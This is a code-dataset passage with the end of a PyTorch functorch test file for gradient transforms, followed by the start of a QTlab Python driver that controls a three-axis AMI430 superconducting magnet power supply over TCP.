= loss_fn(training_energies, training_forces, energies, forces)\n expected = torch.autograd.grad(loss, model.parameters())\n\n self.assertEqual(result, expected)\n\n def test_ensemble_regression(self, device):\n def make_spirals(n_samples, noise_std=0., rotations=1.):\n ts = torch.linspace(0, 1, n_samples)\n rs = ts ** 0.5\n thetas = rs * rotations * 2 * math.pi\n signs = torch.randint(0, 2, (n_samples,)) * 2 - 1\n labels = (signs > 0).to(torch.long)\n\n xs = rs * signs * torch.cos(thetas) + torch.randn(n_samples) * noise_std\n ys = rs * signs * torch.sin(thetas) + torch.randn(n_samples) * noise_std\n points = torch.stack([xs, ys], dim=1)\n return points.to(device), labels.to(device)\n\n points, labels = make_spirals(100, noise_std=0.05)\n\n class MLPClassifier(nn.Module):\n def __init__(self, hidden_dim=32, n_classes=2):\n super().__init__()\n self.hidden_dim = hidden_dim\n self.n_classes = n_classes\n\n self.fc1 = nn.Linear(2, self.hidden_dim)\n self.fc2 = nn.Linear(self.hidden_dim, self.n_classes)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.log_softmax(x, -1)\n return x\n\n loss_fn = nn.NLLLoss()\n\n func_model, weights = make_functional(MLPClassifier().to(device))\n\n def train_step_fn(use_transform, weights, batch, targets, lr=0.2):\n def compute_loss(weights, batch, targets):\n output = func_model(weights, batch)\n loss = loss_fn(output, targets)\n return loss\n\n if use_transform:\n grad_weights, loss = grad_and_value(compute_loss)(weights, batch, targets)\n else:\n loss = compute_loss(weights, batch, targets)\n grad_weights = torch.autograd.grad(loss, weights)\n\n new_weights = []\n with torch.no_grad():\n for grad_weight, weight in zip(grad_weights, weights):\n new_weights.append(weight - grad_weight * lr)\n # NB: return looks weird because torch.vmap must return Tensors\n return (loss, *new_weights)\n\n def unpack(train_result):\n return train_result[0], train_result[1:]\n\n def init_fn(num_models):\n models = tuple(MLPClassifier().to(device) for _ in range(num_models))\n weights = tuple(make_functional(model)[1] for model in models)\n weights = tuple(zip(*weights))\n weights = tuple(torch.stack(shards).detach() for shards in weights)\n return weights\n\n def slice_weights(batched_weights, index):\n return tuple(weight[index].detach().requires_grad_() for weight in batched_weights)\n\n batched_weights = init_fn(num_models=2)\n parallel_train_step_fn = vmap(partial(train_step_fn, True), in_dims=(0, None, None))\n\n result_loss, result_weights = unpack(parallel_train_step_fn(batched_weights, points, labels))\n\n loss0, weights0 = unpack(train_step_fn(False, slice_weights(batched_weights, 0), points, labels))\n loss1, weights1 = unpack(train_step_fn(False, slice_weights(batched_weights, 1), points, labels))\n expected_loss = torch.stack([loss0, loss1])\n expected_weights = tuple(torch.stack([w0, w1]) for w0, w1 in zip(weights0, weights1))\n\n self.assertEqual(result_loss, expected_loss)\n self.assertEqual(result_weights, expected_weights)\n\n @unittest.skipIf(not USE_TORCHVISION, \"test requires torchvision\")\n def test_resnet18_per_sample_grads(self, device):\n # Straight out of opacus\n def _replace_child(\n root: nn.Module, child_name: str, converter: Callable[[nn.Module], nn.Module]\n ) -> None:\n # find the immediate parent\n parent = root\n nameList = child_name.split(\".\")\n for name in nameList[:-1]:\n parent = parent._modules[name]\n # set to identity\n parent._modules[nameList[-1]] = converter(parent._modules[nameList[-1]])\n\n def replace_all_modules(\n root: nn.Module,\n target_class: Type[nn.Module],\n converter: Callable[[nn.Module], nn.Module],\n ) -> nn.Module:\n # base case\n if isinstance(root, target_class):\n return converter(root)\n\n for name, obj in root.named_modules():\n if isinstance(obj, target_class):\n _replace_child(root, name, converter)\n return root\n\n def _batchnorm_to_groupnorm(module: nn.modules.batchnorm._BatchNorm) -> nn.Module:\n return nn.GroupNorm(min(32, module.num_features), module.num_features, affine=True)\n\n def convert_batchnorm_modules(\n model: nn.Module,\n converter: Callable[\n [nn.modules.batchnorm._BatchNorm], nn.Module\n ] = _batchnorm_to_groupnorm,\n ) -> nn.Module:\n return replace_all_modules(model, nn.modules.batchnorm._BatchNorm, converter)\n\n import torchvision.models as models\n model = convert_batchnorm_modules(models.resnet18(num_classes=10)).to(device)\n criterion = nn.CrossEntropyLoss()\n\n func_model, weights = make_functional(model)\n\n def compute_loss(weights, image, target):\n images = image.unsqueeze(0)\n targets = target.unsqueeze(0)\n output = func_model(weights, images)\n loss = criterion(output, targets)\n return loss\n\n batch_size = 3\n images = torch.randn(batch_size, 3, 32, 32, device=device)\n targets = torch.randint(0, 10, (batch_size,), device=device)\n\n result_grads = vmap(grad(compute_loss), in_dims=(None, 0, 0))(weights, images, targets)\n\n expected_grads = [\n torch.autograd.grad(compute_loss(weights, images[i], targets[i]), weights)\n for i in range(batch_size)\n ]\n expected_grads = [torch.stack(shards) for shards in zip(*expected_grads)]\n\n self.assertEqual(result_grads, expected_grads)\n\nonly_for = (\"cpu\", \"cuda\")\ninstantiate_device_type_tests(\n TestGradTransform,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestVmapOfGrad,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestJacrev,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestComposability,\n globals(),\n only_for=only_for,\n)\ninstantiate_device_type_tests(\n TestExamplesCorrectness,\n globals(),\n only_for=only_for,\n)\n\n\n\nif __name__ == '__main__':\n run_tests()\n","sub_path":"test/test_eager_transforms.py","file_name":"test_eager_transforms.py","file_ext":"py","file_size_in_byte":39259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451456303","text":"# QTlab driver for American Magnetics 430 magnet power supply.\n# This version controls 3 solenoids and uses three instances of AMI430_single for that.\n# For a single solenoid, use AMI430_single.\n# For 2D vector operation, use AMI430_2D.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nfrom instrument import Instrument\nimport instruments\nimport qt\nimport types\nimport socket\nimport logging\nimport time\nfrom math import *\nfrom numpy import *\n\nclass AMI430_3D(Instrument):\n \n #Global parameters\n #Important:\n #Set these values in accordance with the limits of each system\n #otherwise magnet quench or damage of equipment might occur\n \n #ratio between current and magnetic field\n COILCONSTANT_X = 0.0146 #T/A\n COILCONSTANT_Y = 0.0426 #T/A\n COILCONSTANT_Z = 0.1107 #T/A\n \n #Rated operating current in A, from spec sheet. A margin of 0.03A is added so that the rated fields fit in.\n #If the magnet quenches regularly, reduce these values!!!!\n CURRENTRATING_X = 68.53 #A\n CURRENTRATING_Y = 70.45 #A\n CURRENTRATING_Z = 81.33 #A\n \n #Rated magnetic field based on the two previous values\n #Note: in many cases, the vector operation is only allowed in a smaller range\n #Set the last value accordingly \n FIELDRATING_X = COILCONSTANT_X*CURRENTRATING_X #T\n FIELDRATING_Y = COILCONSTANT_Y*CURRENTRATING_Y #T\n FIELDRATING_Z = COILCONSTANT_Z*CURRENTRATING_Z #T\n FIELDRATING_XY = 1.0 #T\n FIELDRATING_XZ = 1.0\n FIELDRATING_YZ = 3.0\n FIELDRATING_XYZ = 1.0\n \n #Maximum ramp limits from datasheet\n CURRENTRAMPLIMIT_X = 0.2 #A/s\n CURRENTRAMPLIMIT_Y = 0.05 #A/s\n CURRENTRAMPLIMIT_Z = 0.08 #A/s\n FIELDRAMPLIMIT_X=COILCONSTANT_X*CURRENTRAMPLIMIT_X #T/s\n FIELDRAMPLIMIT_Y=COILCONSTANT_Y*CURRENTRAMPLIMIT_Y #T/s\n FIELDRAMPLIMIT_Z=COILCONSTANT_Z*CURRENTRAMPLIMIT_Z #T/s\n \n #Persistent switch rated currents. \n #These values are based on the autodetect function of the supply unit\n #typical values are ~50mA for wet systems and ~30mA for dry systems\n PSCURRENT_X=50 #mA\n PSCURRENT_Y=50 #mA\n PSCURRENT_Z=50 #mA\n \n #Heat and cooldown time for persistent switch\n PSHEATTIME_X=20 #s\n PSHEATTIME_Y=20 #s\n PSHEATTIME_Z=20 #s\n PSCOOLTIME_X=20 #s\n PSCOOLTIME_Y=20 #s\n PSCOOLTIME_Z=20 #s\n \n #soft parameters\n _mode=0x01\n _alpha=0.0\n _phi=0.0\n \n #soft parameters related to field offset\n _offseten=False\n _fieldoffset=0.0\n _alphaoffset=0.0\n _phioffset=0.0\n _field=0.0 \n\n #global parameter for the presence of persistent switch. Default is True.\n #Check your magnet configuration!\n PSWPRESENT_X=True\n PSWPRESENT_Y=True\n PSWPRESENT_Z=True\n \n #operation mode\n '''\n Available modes:\n \n MODE_RAW: individual magnets can be accessed directly. \n \n MODE_X: only X magnet is driven, Y, Z magnets are at zero.\n \n MODE_Y: only Y magnet is driven, X, Z magnets are at zero.\n \n MODE_Z: only Z magnet is driven, X, Y magnets are at zero.\n \n MODE_XY: 2D vector operation, field amplitude and alpha can be set.\n \n MODE_XZ: 2D vector operation, field amplitude and phi can be set.\n \n MODE_YZ: 2D vector operation, field amplitude and phi can be set.\n \n MODE_XYZ: 3D vector operation, field amplitude and alpha,phi can be set.\n \n '''\n MODE_RAW=0x01\n MODE_X=0x02\n MODE_Y=0x04\n MODE_Z=0x08\n MODE_XY=0x10\n MODE_XZ=0x20\n MODE_YZ=0x40\n MODE_XYZ=0x80\n\n ###Init\n ###Parameters for each axis:\n #address: IP address of magnet controller. Has to be set on front panel. \n #port: TCP port of magnet controller. Should be 7180\n #switchPresent: determines if driver handles persistent switch or not. Check\n # your magnet configuration! Default is yes. Has to be forwarded to\n # global parameter PSWPRESENT\n \n \n def __init__(self, name, addressX='192.168.2.3', addressY='192.168.2.2', addressZ='192.168.2.1', portX=7180, portY=7180, portZ=7180, mode=MODE_RAW, switchPresent_X=True, switchPresent_Y=True, switchPresent_Z=True):\n \n Instrument.__init__(self, name, tags=['measure'])\n \n #pass switchPresent_{X,Y,Z} to their global parameter\n self.PSWPRESENT_X=switchPresent_X\n self.PSWPRESENT_Y=switchPresent_Y\n self.PSWPRESENT_Z=switchPresent_Z\n \n self._create_parameters(mode)\n \n self.set_mode(mode, init=True)\n \n #We create the underlying instances of AMI430_single\n \n self._channelX=qt.instruments.create(name + '_X', 'AMI430_single', address=addressX, port=portX, switchPresent=switchPresent_X)\n self._channelY=qt.instruments.create(name + '_Y', 'AMI430_single', address=addressY, port=portY, switchPresent=switchPresent_Y)\n self._channelZ=qt.instruments.create(name + '_Z', 'AMI430_single', address=addressZ, port=portZ, switchPresent=switchPresent_Z)\n \n #and override the limits for each channel\n self._channelX.set_parameter_bounds('field', -self.FIELDRATING_X, self.FIELDRATING_X)\n self._channelX.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_X)\n \n self._channelY.set_parameter_bounds('field', -self.FIELDRATING_Y, self.FIELDRATING_Y)\n self._channelY.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_Y)\n\n self._channelZ.set_parameter_bounds('field', -self.FIELDRATING_Z, self.FIELDRATING_Z)\n self._channelZ.set_parameter_bounds('rampRate', 0.0, self.FIELDRAMPLIMIT_Z)\n \n self.add_function('reset')\n\n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_function('rampToX')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_function('rampToY')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_function('rampToZ')\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_function('resetQuenchX')\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_function('resetQuenchY')\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_function('resetQuenchZ')\n \n self.get_all()\n \n def reset(self): ###TODO\n pass\n \n def _create_parameters(self, mode):\n \n if 'mode' not in self.get_parameter_names(): #only create it once\n self.add_parameter('mode', type=types.IntType,\n flags=Instrument.FLAG_GETSET,\n format_map={self.MODE_RAW:'Raw mode',\n self.MODE_X:'X magnet',\n self.MODE_Y:'Y magnet',\n self.MODE_Z:'Z magnet',\n self.MODE_XY:'XY magnet',\n self.MODE_XZ:'XZ magnet',\n self.MODE_YZ:'YZ magnet',\n self.MODE_XYZ:'XYZ magnet'})\n \n if self.PSWPRESENT_X & (mode & (self.MODE_RAW | self.MODE_X)): \n self.add_parameter('pSwitchX', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'})\n \n if self.PSWPRESENT_Y & (mode & (self.MODE_RAW | self.MODE_Y)):\n self.add_parameter('pSwitchY', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n \n if self.PSWPRESENT_Z & (mode & (self.MODE_RAW | self.MODE_Z)):\n self.add_parameter('pSwitchZ', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n\n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_parameter('fieldX', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_X, maxval=self.FIELDRATING_X,\n format='%.6f')\n elif mode & (self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('fieldX', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_parameter('fieldY', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_Y, maxval=self.FIELDRATING_Y,\n format='%.6f')\n elif mode & (self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('fieldY', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_parameter('fieldZ', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=-self.FIELDRATING_Z, maxval=self.FIELDRATING_Z,\n format='%.6f')\n elif mode & (self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('fieldZ', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & self.MODE_XY:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XY,\n format='%.6f')\n elif mode & self.MODE_XZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XZ,\n format='%.6f')\n elif mode & self.MODE_YZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_YZ,\n format='%.6f')\n elif mode & self.MODE_XYZ:\n self.add_parameter('field', type=types.FloatType,\n flags=Instrument.FLAG_SET | Instrument.FLAG_GET,\n units='T',\n minval=0.0, maxval=self.FIELDRATING_XYZ,\n format='%.6f')\n \n if mode & (self.MODE_XY | self.MODE_XYZ):\n self.add_parameter('alpha', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n \n if mode & (self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('phi', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='degree',\n minval=-180.0, maxval=180.0,\n format='%.3f')\n \n if mode & (self.MODE_RAW | self.MODE_X):\n self.add_parameter('setPointX', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Y):\n self.add_parameter('setPointY', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_Z):\n self.add_parameter('setPointZ', type=types.FloatType,\n flags=Instrument.FLAG_GET,\n units='T',\n format='%.6f')\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('rampRateX', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_X, format='%.5f') \n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampRateY', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_Y, format='%.5f')\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampRateZ', type=types.FloatType,\n flags=Instrument.FLAG_GETSET,\n units='T/s',\n minval=0.0, maxval=self.FIELDRAMPLIMIT_Z, format='%.5f')\n\n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('rampStateX', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'}) \n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampStateY', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'})\n\n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('rampStateZ', type=types.IntType,\n flags=Instrument.FLAG_GET,\n format_map={1:'Ramping', 2:'Holding', 3:'Paused', 4:'Manual up',\n 5:'Manual down', 6:'Ramping to zero', 7:'Quench detected', \n 8:'At zero', 9:'Heating switch', 10:'Cooling switch'})\n\n if self.PSWPRESENT_X & (mode & (self.MODE_RAW | self.MODE_X)):\n self.add_parameter('persistentX', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if self.PSWPRESENT_Y & (mode & (self.MODE_RAW | self.MODE_Y)):\n self.add_parameter('persistentY', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if self.PSWPRESENT_Z & (mode & (self.MODE_RAW | self.MODE_Z)):\n self.add_parameter('persistentZ', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'driven mode',True:'persistent mode'})\n \n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('quenchX', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('quenchY', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n \n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('quenchZ', type=types.BooleanType,\n flags=Instrument.FLAG_GET,\n format_map={False:'off',True:'on'})\n\n if mode & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n self.add_parameter('errorX', type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('errorY', type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n self.add_parameter('errorZ', type=types.StringType,\n flags=Instrument.FLAG_GET)\n \n if mode & self.MODE_XYZ:\n self.add_parameter('offsetEnabled', type=types.BooleanType,\n flags=Instrument.FLAG_GETSET,\n format_map={False:'off',True:'on'}) \n \n def get_all(self):\n for p in self.get_parameter_names():\n self.get(p)\n\n #mode of operation \n \n def do_get_mode(self):\n return self._mode\n\n #if the new mode is the same as earlier, then nothing happens\n #otherwise we ramp the magnets to zero\n #and add & remove parameters as needed\n \n def do_set_mode(self, mode, init=False):\n if init or (self.get_mode() == mode):\n return True\n else:\n self._channelX.set_field(0.0)\n self._channelY.set_field(0.0)\n self._channelZ.set_field(0.0)\n if self.PSWPRESENT_X:\n self._channelX.set_pSwitch(False)\n if self.PSWPRESENT_Y:\n self._channelY.set_pSwitch(False)\n if self.PSWPRESENT_Z:\n self._channelZ.set_pSwitch(False)\n self._mode=mode\n for p in self.get_parameter_names(): #it is probably not safe to remove the parameter in set_parameter\n if p != 'mode':\n self.remove_parameter(p)\n self._create_parameters(mode)\n self.get_all() \n return True\n\n #Actual parameters implemented\n #First, we define the wrapper functions to access the individual magnets\n \n def do_get_pSwitchX(self):\n if not self.PSWPRESENT_X:\n return False\n return self._channelX.get_pSwitch()\n \n def do_get_pSwitchY(self):\n if not self.PSWPRESENT_Y:\n return False\n return self._channelY.get_pSwitch()\n\n def do_get_pSwitchZ(self):\n if not self.PSWPRESENT_Z:\n return False\n return self._channelZ.get_pSwitch()\n \n def do_set_pSwitchX(self, value):\n if not self.PSWPRESENT_X:\n logging.error(__name__ +': No persistent switch present on X magnet')\n return False\n return self._channelX.set_pSwitch(value)\n \n def do_set_pSwitchY(self, value):\n if not self.PSWPRESENT_Y:\n logging.error(__name__ +': No persistent switch present on Y magnet')\n return False\n return self._channelY.set_pSwitch(value)\n\n def do_set_pSwitchZ(self, value):\n if not self.PSWPRESENT_Z:\n logging.error(__name__ +': No persistent switch present on Z magnet')\n return False\n return self._channelZ.set_pSwitch(value)\n \n def do_get_rampStateX(self):\n return self._channelX.get_rampState()\n \n def do_get_rampStateY(self):\n return self._channelY.get_rampState()\n\n def do_get_rampStateZ(self):\n return self._channelZ.get_rampState()\n \n def do_get_fieldX(self):\n return self._channelX.get_field()\n \n def do_set_fieldX(self, value):\n return self._channelX.set_field(value)\n \n def do_get_fieldY(self):\n return self._channelY.get_field()\n \n def do_set_fieldY(self, value):\n return self._channelY.set_field(value)\n\n def do_get_fieldZ(self):\n return self._channelZ.get_field()\n \n def do_set_fieldZ(self, value):\n return self._channelZ.set_field(value)\n \n def do_get_setPointX(self):\n return self._channelX.get_setPoint()\n \n def do_get_setPointY(self):\n return self._channelY.get_setPoint()\n\n def do_get_setPointZ(self):\n return self._channelZ.get_setPoint()\n\n def do_get_rampRateX(self):\n return self._channelX.get_rampRate()\n \n def do_set_rampRateX(self, value):\n return self._channelX.set_rampRate(value)\n \n def do_get_rampRateY(self):\n return self._channelY.get_rampRate()\n \n def do_set_rampRateY(self, value):\n return self._channelY.set_rampRate(value)\n\n def do_get_rampRateZ(self):\n return self._channelZ.get_rampRate()\n \n def do_set_rampRateZ(self, value):\n return self._channelZ.set_rampRate(value)\n \n def do_get_persistentX(self):\n if not self.PSWPRESENT_X:\n return False\n return self._channelX.get_persistent()\n \n def do_set_persistentX(self, value):\n if not self.PSWPRESENT_X:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of X magnet')\n return False\n return self._channelX.set_persistent(value)\n\n def do_get_persistentY(self):\n if not self.PSWPRESENT_Y:\n return False\n return self._channelY.get_persistent()\n \n def do_set_persistentY(self, value):\n if not self.PSWPRESENT_Y:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of Y magnet')\n return False\n return self._channelY.set_persistent(value)\n\n def do_get_persistentZ(self):\n if not self.PSWPRESENT_Z:\n return False\n return self._channelZ.get_persistent()\n \n def do_set_persistentZ(self, value):\n if not self.PSWPRESENT_Z:\n logging.error(__name__ + ': No persistent switch present, cannot alter persistent mode of Z magnet')\n return False\n return self._channelZ.set_persistent(value)\n \n def do_get_quenchX(self):\n return self._channelX.get_quench()\n \n def do_get_quenchY(self):\n return self._channelY.get_quench()\n\n def do_get_quenchZ(self):\n return self._channelZ.get_quench()\n\n def do_get_errorX(self):\n return self._channelX.get_error()\n \n def do_get_errorY(self):\n return self._channelY.get_error()\n\n def do_get_errorZ(self):\n return self._channelZ.get_error()\n \n def rampToX(self, value):\n if self.get_mode() & (self.MODE_RAW |self.MODE_X):\n return self._channelX.rampTo(value)\n else:\n return False\n \n def rampToY(self, value):\n if self.get_mode() & (self.MODE_RAW |self.MODE_Y):\n return self._channelY.rampTo(value)\n else:\n return False\n\n def rampToZ(self, value):\n if self.get_mode() & (self.MODE_RAW |self.MODE_Z):\n return self._channelZ.rampTo(value)\n else:\n return False\n \n def resetQuenchX(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_X | self.MODE_XY | self.MODE_XZ | self.MODE_XYZ):\n return self._channelX.resetQuench()\n else:\n return False \n\n def resetQuenchY(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Y | self.MODE_XY | self.MODE_YZ | self.MODE_XYZ):\n return self._channelY.resetQuench()\n else:\n return False \n \n def resetQuenchZ(self):\n if self.get_mode() & (self.MODE_RAW | self.MODE_Z | self.MODE_XZ | self.MODE_YZ | self.MODE_XYZ):\n return self._channelY.resetQuench()\n else:\n return False\n \n def do_get_field(self):\n if self.get_mode() == self.MODE_XY:\n return math.hypot(self.get_fieldX(), self.get_fieldY())\n elif self.get_mode() == self.MODE_XZ:\n return math.hypot(self.get_fieldX(), self.get_fieldZ())\n elif self.get_mode() == self.MODE_YZ:\n return math.hypot(self.get_fieldY(), self.get_fieldZ())\n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n return self._field\n else:\n self._field=math.hypot(math.hypot(self.get_fieldX(), self.get_fieldY()),self.get_fieldZ())\n return self._field\n else:\n return False\n \n def do_set_field(self, value):\n if self.get_mode() == self.MODE_XY:\n a=math.radians(self.get_alpha())\n return self._channelX.set_field(value*math.cos(a)) and self._channelY.set_field(value*math.sin(a))\n elif self.get_mode() == self.MODE_XZ:\n f=math.radians(self.get_phi())\n return self._channelX.set_field(value*math.sin(f)) and self._channelZ.set_field(value*math.cos(f))\n elif self.get_mode() == self.MODE_YZ:\n f=math.radians(self.get_phi())\n return self._channelY.set_field(value*math.sin(f)) and self._channelZ.set_field(value*math.cos(f))\n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+value*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+value*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+value*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._field=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying field in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n f=math.radians(self._phi)\n a=math.radians(self._alpha)\n Bx=value*math.sin(f)*math.cos(a)\n By=value*math.sin(f)*math.sin(a)\n Bz=value*math.cos(f)\n self._field=value\n return self._sweepFieldsXYZ(Bx, By, Bz)\n else: \n return False\n \n # We do it in the safe way: always do the ramp down first,\n # and only ramp up the other axis afterwards\n # this results in some performance penalty compared to\n # a straight simultaneous ramp to the new value \n \n def do_get_alpha(self):\n return self._alpha\n \n def do_set_alpha(self, value):\n if self.get_mode() == self.MODE_XY:\n B=self.get_field()\n a=math.radians(value)\n oldX=self.get_fieldX()\n newX=B*math.cos(a)\n newY=B*math.sin(a)\n self._alpha=value \n if math.fabs(newX) < math.fabs(oldX):\n return self._channelX.set_field(newX) and self._channelY.set_field(newY)\n else:\n return self._channelY.set_field(newY) and self._channelX.set_field(newX)\n elif self.get_mode() == self.MODE_XYZ:\n if self._offseten:\n a=math.radians(value)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXY(Bxtot, Bytot):\n self._alpha=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying alpha in offset mode')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n else:\n B=self.get_field()\n a=math.radians(value)\n f=math.radians(self._phi)\n newX=B*math.cos(a)*sin(f)\n newY=B*math.sin(a)*sin(f)\n if self._sweepFieldsXY(newX, newY):\n self._alpha=value\n return True\n else:\n logging.error(__name__ + ': Error while applying alpha')\n return False \n else:\n return False\n \n def do_get_phi(self):\n return self._phi\n \n def do_set_phi(self, value):\n if self.get_mode() == self.MODE_XZ:\n B=self.get_field()\n f=math.radians(value)\n oldX=self.get_fieldX()\n 